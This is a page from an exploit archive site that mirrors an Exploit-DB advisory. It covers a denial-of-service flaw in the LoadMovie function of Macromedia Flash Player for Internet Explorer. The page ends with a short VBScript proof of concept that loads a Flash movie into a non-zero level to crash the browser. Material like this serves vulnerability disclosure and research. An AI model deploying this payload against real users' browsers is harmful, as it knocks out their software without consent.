Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Denial of Service in Macromedia Flash Player for Internet Explorer - exploit.company
header-logo
Suggest Exploit
vendor:
Flash Player for Internet Explorer
by:
Unknown
N/A
CVSS
N/A
Denial of Service
Unknown
CWE
Product Name: Flash Player for Internet Explorer
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP1 and SP2
Unknown

Denial of Service in Macromedia Flash Player for Internet Explorer

The vulnerability exists in the 'LoadMovie' function of Macromedia Flash Player for Internet Explorer. By calling the function and loading a flash movie into a non-zero level, an attacker can cause an instance of Internet Explorer to crash.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10057/info

It has been reported that Macromedia Flash Player for Internet Explorer may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue is reported to exist in the 'LoadMovie' function by calling the function and loading a flash movie into a non-zero level in the following manner:

LoadMovie 1,"c6ool.swf"

This vulnerability is reported to be tested in Flash Player 7.0 r19 running on WindowsXP Professional SP1 and SP2. 

<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>